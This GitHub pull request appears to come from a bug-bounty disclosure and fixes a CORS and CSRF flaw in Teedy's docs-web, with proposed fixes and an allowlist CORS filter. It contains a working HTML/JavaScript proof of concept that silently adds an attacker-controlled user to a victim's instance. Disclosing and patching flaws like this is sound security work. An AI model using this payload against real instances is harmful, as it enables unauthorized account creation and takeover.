This repository was archived by the owner on Dec 19, 2023. It is now read-only.

Conversation

@DEMON1A

@DEMON1A DEMON1A commented Feb 13, 2021

📊 Metadata *

  • CORS misconfiguration chained with improper CSRF validation on cookies leads to instance takeover by adding a user to the instance with attacker-controlled credentials.

Bounty URL: https://www.huntr.dev/bounties/2-other-docs/

⚙️ Description *

  • This issue can be fixed with multiple fixes, but before that I would like to explain the root cause and why this is happening. docs-web is using docs-web-commons for multiple things, including the CORS filter. In the docs-web-common CORS filter you're returning the value of request.getHeader("origin") in the Access-Control-Allow-Origin header. That allows any site in the world to send HTTP requests to the instance and read the response, since Access-Control-Allow-Credentials is set to true. Before using CORS under /api/* you're checking whether the application is in development mode first. Okay, the problem is that every manual build is used with application.mode,dev. The users have to change that in pom.xml, but nothing is pointed out about it. The CORS misconfiguration can lead to serious issues. In this case attackers are able to add users to the instance with their own credentials, then log in with them and gain access to the Teedy instance. Even in dev mode, developers won't need such a thing; they can just temporarily disable Chrome protections. The way you're handling CORS isn't secure. See the bounty URL for the whole issue description with a proof of concept for the instance takeover.

💻 Technical Description *

  • The fix I added was changing response.addHeader('Access-Control-Allow-Credentials' , 'true') into response.addHeader('Access-Control-Allow-Credentials' , 'false') in CORsfilter.java to disable sending credentials with the XHR requests.

  • You can apply other fixes, like adding an array with allowed hosts, then checking whether the origin header is one of them. If it is, then reflect the origin and allow credentials. If it's not, then reflect the origin without credentials allowed. Tell me if you want me to apply this fix; I can change the files before the PR gets accepted/rejected.

🐛 Proof of Concept (PoC) *

  • Use this HTML code, replacing {HOST} with your own Teedy instance host. Then view it in a browser and click the button. Another user will be added to your instance and you will be able to log in with: tester:password123

```html
<!DOCTYPE html>
<html>
<head>
    <title>Hello World</title>
</head>
<body>
    <div style="text-align: center;">
        <h1>Click The Button Below</h1>
        <input type="button" name="test" onclick="addUser();">
    </div>

    <script type="text/javascript">
        function addUser() {
            const http = new XMLHttpRequest();
            const url = "http://{HOST}:8080/docs-web/api/user?email=hacker@gmail.com&password=password123&passwordconfirm=password123&storage_quota=100000000&username=tester";

            http.withCredentials = true;
            http.open('PUT' , url);
            http.setRequestHeader('Content-Type' , 'application/x-www-form-urlencoded;charset=utf-8');
            http.send();

            http.onreadystatechange = (e) => {
                alert('Exploited!');
            }
        }
    </script>
</body>
</html>
```

🔥 Proof of Fix (PoF) *

  • Here's a screenshot of the edit I made to my instance's code. Now it's working with credentials disallowed.

[Screenshot: Docs-Proof-Of-Fix]

👍 User Acceptance Testing (UAT)

  • As I said before, tested on my instance.

🔗 Relates to...
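A stricter variant of the allowlist fix proposed under Technical Description, written here as an added example rather than Teedy's own CorsFilter code: the Origin header is reflected (with credentials) only when it exactly matches a configured list, and an unknown origin gets no CORS headers at all instead of a reflected origin without credentials. It assumes the javax.servlet API, Java 9+, and hypothetical example.com origins.

```java
import java.io.IOException;
import java.util.Set;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/** Added example (not Teedy's own CorsFilter): reflects Origin only for allowlisted origins. */
public class AllowlistCorsFilter implements Filter {
    // Hypothetical allowlist of the deployed front-end origins; load from config in practice.
    private static final Set<String> ALLOWED_ORIGINS = Set.of(
            "https://docs.example.com",
            "https://intranet.example.com");

    @Override
    public void init(FilterConfig filterConfig) {}

    @Override
    public void destroy() {}

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;
        String origin = request.getHeader("Origin");

        if (isAllowed(origin)) {
            // Exact allowlist match: reflect the origin and permit cookies on the call.
            response.setHeader("Access-Control-Allow-Origin", origin);
            response.setHeader("Access-Control-Allow-Credentials", "true");
            response.setHeader("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE, OPTIONS");
            response.setHeader("Access-Control-Allow-Headers", "Content-Type, Authorization");
            response.setHeader("Vary", "Origin"); // a reflected header must not be cached across origins
        }
        // Any other origin gets no CORS headers at all, so the browser refuses to expose the
        // response to the calling page and a credentialed cross-site request cannot be read.

        if ("OPTIONS".equalsIgnoreCase(request.getMethod())) {
            response.setStatus(HttpServletResponse.SC_NO_CONTENT); // preflight stops here
            return;
        }
        chain.doFilter(req, res);
    }

    /** Exact string comparison only: no prefix, suffix or regex matching of the Origin value. */
    static boolean isAllowed(String origin) {
        return origin != null && ALLOWED_ORIGINS.contains(origin);
    }
}
```

Registering this filter on /api/* replaces the reflect-any-origin behaviour described above; the allowlist should contain only the origins the instance is actually served from.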

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Feb 13, 2021
@huntr-helper

👋 Hello, @jendib - @DEMON1A has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@jendib & @DEMON1A - thank you for your efforts in securing the world’s open source code! 🎉
